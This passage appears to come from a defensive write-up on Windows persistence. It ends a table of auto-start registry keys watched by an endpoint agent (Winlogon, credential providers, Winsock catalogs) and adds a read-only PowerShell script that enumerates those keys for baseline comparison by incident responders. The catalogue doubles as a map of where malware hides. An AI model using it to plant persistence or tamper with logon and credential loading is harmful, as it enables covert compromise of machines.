152 | WINLOGON | HKLM | Software\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters* | |
153 | WINLOGON | HKLM | Software\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers* | |
154 | WINLOGON | HKLM | Software\Microsoft\Windows\CurrentVersion\Authentication\PLAP Providers* | |
155 | WINLOGON | HKLM | Software\Policies\Microsoft\Windows\Control Panel\Desktop\Scrnsave.exe | |
156 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDll | |
157 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LsaStart | |
158 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify*\DLLName | |
159 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SaveDumpStart | |
160 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\ServiceControllerStart | |
161 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\System | |
162 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\UIHost | |
163 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters* | |
164 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers* | |
165 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\PLAP Providers* | |
166 | WINLOGON | HKLM | Software\Wow6432Node\Policies\Microsoft\Windows\Control Panel\Desktop\Scrnsave.exe | |
167 | WINLOGON | HKLM | System\CurrentControlSet\Control\BootVerificationProgram\ImagePath | |
168 | WINSOCK PROVIDER | HKLM | System\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL | |
169 | WINSOCK PROVIDER | HKLM | System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64*\LibraryPath | |
170 | WINSOCK PROVIDER | HKLM | System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries*\LibraryPath | |
171 | WINSOCK PROVIDER | HKLM | System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64*\PackedCatalogItem | |
172 | WINSOCK PROVIDER | HKLM | System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries*\PackedCatalogItem |
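The table lists where the agent looks, but not what is currently sitting in those locations on a given host. The PowerShell script below is an added example, not Red Cloak code and not a reproduction of the agent's own collection logic: it walks a hand-picked subset of the rows above, expands the table's `\*` notation, and prints every registered value so that a responder can compare a host against a known-good baseline. Two things are this example's own assumptions: the reading of `*` as "any subkey at this level, or every value when it is the last element", and the decision to expand `HKCU` to every loaded hive under `HKEY_USERS` rather than only the session's own user. The pattern list `$asepPatterns` and the helper names are invented for the example; it needs PowerShell 5 or later for `using namespace` and should run elevated so that other users' hives are readable.

```powershell
# Added example, not Red Cloak code: enumerate a hand-picked subset of the
# auto-start locations from the table above and print what is registered there.
# Assumed table notation: each "*" matches any subkey at that level; a trailing
# "*" matches every value of the key (and each subkey's default value).
# Run elevated so that the loaded user hives under HKEY_USERS are readable.
using namespace Microsoft.Win32

# Constructed subset of table rows; hive tokens and paths copied from the table.
$asepPatterns = @(
    @{ Hives = 'HKCU','HKLM'; Path = 'Software\Microsoft\Windows\CurrentVersion\Run\*' }
    @{ Hives = 'HKCU','HKLM'; Path = 'Software\Microsoft\Windows\CurrentVersion\RunOnce\*' }
    @{ Hives = 'HKLM';        Path = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit' }
    @{ Hives = 'HKCU','HKLM'; Path = 'Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell' }
    @{ Hives = 'HKLM';        Path = 'SYSTEM\CurrentControlSet\Control\Lsa\Security Packages' }
    @{ Hives = 'HKLM';        Path = 'System\CurrentControlSet\Control\Session Manager\KnownDlls' }
    @{ Hives = 'HKLM';        Path = 'SYSTEM\CurrentControlSet\Services\*\Parameters\ServiceDll' }
    @{ Hives = 'HKLM';        Path = 'Software\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\*' }
    @{ Hives = 'HKCU','HKLM'; Path = 'Software\Microsoft\Active Setup\Installed Components\*\StubPath' }
)

# Resolve a hive token to one or more RegistryKey roots. HKCU is expanded to
# every loaded hive under HKEY_USERS (the *_Classes hives carry only COM and
# file-association data and are skipped), which is closer to a system-wide
# agent's view than the single current-user hive of this PowerShell session.
function Get-HiveRoot([string]$Hive) {
    switch ($Hive) {
        'HKLM' { [Registry]::LocalMachine }
        'HKCU' {
            foreach ($sid in [Registry]::Users.GetSubKeyNames()) {
                if ($sid -notlike '*_Classes') { [Registry]::Users.OpenSubKey($sid) }
            }
        }
        default { throw "Unsupported hive token: $Hive" }
    }
}

# Build one output record for a value. REG_EXPAND_SZ data is kept unexpanded,
# exactly as stored, because a %VARIABLE% can point somewhere other than the
# expanded form suggests. Multi-string and binary data are joined with "|"
# so that records round-trip through Export-Csv/Compare-Object unchanged.
function New-AsepRecord([RegistryKey]$Key, [string]$ValueName) {
    $display = if ($ValueName) { $ValueName } else { '(Default)' }
    $data = $Key.GetValue($ValueName, $null,
                          [RegistryValueOptions]::DoNotExpandEnvironmentNames)
    [pscustomobject]@{
        Key   = $Key.Name
        Value = $display
        Kind  = $Key.GetValueKind($ValueName)
        Data  = @($data) -join '|'
    }
}

# Recursive expansion of one path pattern under one root key. PowerShell's
# -eq and -contains are case-insensitive, matching registry semantics.
function Expand-AsepPattern([RegistryKey]$Key, [string[]]$Segments) {
    $seg  = $Segments[0]
    $rest = @($Segments | Select-Object -Skip 1)

    if ($rest.Count -gt 0) {
        $names = if ($seg -eq '*') { $Key.GetSubKeyNames() } else { @($seg) }
        foreach ($name in $names) {
            $sub = $Key.OpenSubKey($name)
            if ($sub) { Expand-AsepPattern $sub $rest; $sub.Dispose() }
        }
        return
    }

    # Last element: "*" = all values here plus each subkey's default value
    # (Credential Providers\{CLSID}); a subkey name (KnownDlls) = all of that
    # key's values; anything else is a single value name (Userinit).
    if ($seg -eq '*') {
        foreach ($v in $Key.GetValueNames()) { New-AsepRecord $Key $v }
        foreach ($name in $Key.GetSubKeyNames()) {
            $sub = $Key.OpenSubKey($name)
            if ($sub -and ($sub.GetValueNames() -contains '')) { New-AsepRecord $sub '' }
        }
    }
    elseif ($Key.GetSubKeyNames() -contains $seg) {
        $sub = $Key.OpenSubKey($seg)
        foreach ($v in $sub.GetValueNames()) { New-AsepRecord $sub $v }
    }
    elseif ($Key.GetValueNames() -contains $seg) {
        New-AsepRecord $Key $seg
    }
}

$results = foreach ($pattern in $asepPatterns) {
    foreach ($hive in $pattern.Hives) {
        foreach ($root in Get-HiveRoot $hive) {
            Expand-AsepPattern $root ($pattern.Path -split '\\')
        }
    }
}

$results | Sort-Object Key, Value | Format-Table -AutoSize Key, Value, Kind, Data

# Baseline workflow: export once from a known-good image, then diff later
# snapshots; new or changed Data is what a responder reviews first.
# $results | Export-Csv -NoTypeInformation asep-baseline.csv
# Compare-Object (Import-Csv asep-baseline.csv) $results -Property Key, Value, Data
```

Further rows from the table can be pasted into `$asepPatterns` as they stand, including the `Wow6432Node` variants, provided the script runs in a 64-bit PowerShell host; a 32-bit host has the non-`Wow6432Node` `Software` paths silently redirected by the registry redirector and would report the 32-bit view twice. The two `Scrnsave.exe`, `load` and `run` rows under `HKCU` are worth adding for the same reason the script expands `HKCU` across `HKEY_USERS`: persistence planted in another user's hive is invisible from the responder's own session.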